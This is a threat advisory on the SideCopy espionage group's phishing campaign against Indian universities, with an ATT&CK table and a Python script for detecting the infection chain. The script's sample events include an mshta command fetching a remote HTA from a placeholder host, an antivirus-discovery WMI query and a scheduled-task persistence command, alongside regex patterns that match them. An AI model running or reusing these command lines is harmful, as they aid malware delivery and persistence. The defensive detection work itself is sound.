Threat Advisory

SideCopy APT Targets Universities via Malicious Website, LNK Files and RATs

Threat: Malicious Campaign
Threat Actor Name: SideCopy
Threat Actor Type: Espionage
Targeted Region: India
Alias: Fringe Leopard, G1008
Threat Actor Region: Pakistan
Targeted Sector: Education
Criticality: High

EXECUTIVE SUMMARY

A malicious website linked to the SideCopy APT group has been uncovered, revealing a sophisticated threat targeting South Asian nations, particularly India. The group employs various tactics, including malicious LNK files and multi-stage infection chains, to compromise systems. Of particular concern is its focus on university students, an area where its activity potentially intersects with other APT groups such as Transparent Tribe.

SideCopy initiates its attacks through spam emails containing links to malicious archive files. When the archive contents are executed, they trigger a sequence of events, including the download and execution of HTA files, leading to the deployment of malware payloads such as Reverse RAT and Action RAT. The malware uses several techniques for persistence and evasion, and adapts its behavior depending on whether antivirus software is present on the host. The group also uses PHP files on the malicious website to tailor the delivered content to the victim's operating system.

SideCopy's activity poses a significant threat to entities in South Asia, and to India in particular. Its layered attack chain underscores the need for robust, defense-in-depth controls. Collaboration and information sharing are vital for understanding and mitigating the evolving threat posed by groups like SideCopy and their potential overlap with other threat actors. Vigilance, adaptive defenses, and proactive response strategies remain essential in safeguarding against such persistent threats.

THREAT PROFILE:

Tactic               | Technique ID | Technique
---------------------|--------------|-----------------------------------------
Execution            | T1059        | Command and Scripting Interpreter
Execution            | T1053        | Scheduled Task/Job
Execution            | T1047        | Windows Management Instrumentation
Persistence          | T1547        | Boot or Logon Autostart Execution
Privilege Escalation | T1574        | Hijack Execution Flow
Defense Evasion      | T1027        | Obfuscated Files or Information
Defense Evasion      | T1140        | Deobfuscate/Decode Files or Information
Defense Evasion      | T1112        | Modify Registry
Discovery            | T1082        | System Information Discovery
Discovery            | T1083        | File and Directory Discovery
Discovery            | T1518        | Software Discovery
Command and Control  | T1071        | Application Layer Protocol
Command and Control  | T1105        | Ingress Tool Transfer
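The following detection sketch is an added example and is not code from the advisory, from Cyble, or from SideCopy tooling. It shows how a SOC might correlate the chain shape described in the executive summary (archive/LNK execution, remote HTA fetched and run by mshta.exe, follow-on command execution, an antivirus presence check, and persistence via a scheduled task) using the technique IDs from the threat profile above. The process-creation events, hostnames, URLs and file paths are constructed for illustration; the WMI SecurityCenter2 query and the schtasks /create command line are generic examples of an AV check and task persistence, not indicators taken from the campaign.

```python
"""Correlate a LNK -> mshta -> RAT style chain over process-creation events.

Added example for this advisory; the events, hosts, URLs and paths below are
constructed and do not come from the campaign or from the referenced report.
"""
import json
import re

# Constructed Sysmon-style process-creation events, one JSON object per line.
SAMPLE_EVENTS = r"""
{"ts":"2024-01-10T09:14:02Z","host":"lab-ws1","pid":4120,"ppid":1300,"image":"C:\\Windows\\explorer.exe","cmd":"C:\\Windows\\explorer.exe"}
{"ts":"2024-01-10T09:14:05Z","host":"lab-ws1","pid":5520,"ppid":4120,"image":"C:\\Windows\\System32\\mshta.exe","cmd":"mshta.exe http://example.invalid/notice.hta"}
{"ts":"2024-01-10T09:14:07Z","host":"lab-ws1","pid":5601,"ppid":5520,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName"}
{"ts":"2024-01-10T09:14:09Z","host":"lab-ws1","pid":5633,"ppid":5520,"image":"C:\\Windows\\System32\\schtasks.exe","cmd":"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\Public\\svc.exe"}
{"ts":"2024-01-10T09:20:00Z","host":"lab-ws1","pid":6100,"ppid":4120,"image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","cmd":"firefox.exe"}
{"ts":"2024-01-10T09:21:00Z","host":"lab-ws1","pid":6200,"ppid":4120,"image":"C:\\Windows\\System32\\mshta.exe","cmd":"mshta.exe C:\\Temp\\local.hta"}
"""

# mshta.exe pulling its HTA from a remote URL (ingress tool transfer, T1105).
# UNC paths are deliberately not matched here; add them if your telemetry needs it.
REMOTE_RE = re.compile(r"(?i)\b(?:https?|ftp)://")
# Interpreters / LOLBins an HTA typically spawns next (T1059, T1053, T1112).
MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "schtasks.exe", "reg.exe", "rundll32.exe"}
# Generic AV presence check through WMI (T1047 + T1518); an assumed pattern,
# not an indicator from the campaign.
AV_DISCOVERY_RE = re.compile(r"(?i)securitycenter2|antivirusproduct")
# Scheduled-task or Run-key persistence (T1053 / T1547).
PERSIST_RE = re.compile(
    r"(?i)schtasks(?:\.exe)?\s+/create|reg(?:\.exe)?\s+add\s+.*\\currentversion\\run")


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def alert(rule, technique, event):
    return {"rule": rule, "technique": technique, "pid": event["pid"],
            "ts": event["ts"], "host": event["host"], "cmd": event["cmd"]}


def detect_events(events, by_pid):
    """Apply the per-event rules; returns one alert per (event, rule) hit."""
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name == "mshta.exe" and REMOTE_RE.search(e["cmd"]):
            alerts.append(alert("remote_hta", "T1105", e))
        if pname == "mshta.exe" and name in MSHTA_CHILDREN:
            alerts.append(alert("mshta_child", "T1059", e))
        if AV_DISCOVERY_RE.search(e["cmd"]):
            alerts.append(alert("av_discovery", "T1518", e))
        if PERSIST_RE.search(e["cmd"]):
            alerts.append(alert("persistence", "T1053", e))
    return alerts


def detect(text):
    events = parse_events(text)
    return detect_events(events, {e["pid"]: e for e in events})


def lineage(by_pid, pid):
    """Walk pid -> ppid, returning the process and its ancestors, nearest first."""
    out, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        out.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return out


def correlate(text):
    """Group alerts under the nearest mshta.exe ancestor and rate each chain.

    A chain is 'high' when a remote HTA was fetched *and* mshta spawned a
    follow-on interpreter; anything else is 'medium'. A local HTA with no
    children (pid 6200 above) raises no alert at all, which is a known gap:
    a staged HTA dropped to disk first needs file-write telemetry to catch.
    """
    events = parse_events(text)
    by_pid = {e["pid"]: e for e in events}
    chains = {}
    for a in detect_events(events, by_pid):
        anchor = next((e["pid"] for e in lineage(by_pid, a["pid"])
                       if basename(e["image"]) == "mshta.exe"), a["pid"])
        chains.setdefault(anchor, set()).add(a["rule"])
    return {pid: ("high" if {"remote_hta", "mshta_child"} <= rules else "medium")
            for pid, rules in chains.items()}


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["ts"]} {a["host"]} pid={a["pid"]} {a["rule"]} ({a["technique"]}): {a["cmd"]}')
    print(correlate(SAMPLE_EVENTS))
```

The rules are intentionally narrow: they key on the chain shape rather than on any hash, domain or file name, so they keep working when the actor rotates infrastructure. The trade-off is the local-HTA gap noted in the docstring, so pair this with file-creation or script-block telemetry in production.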

REFERENCES:

The following reports contain further technical details:

https://cyble.com/blog/the-overlapping-cyber-strategies-of-transparent-tribe-and-sidecopy-against-india/
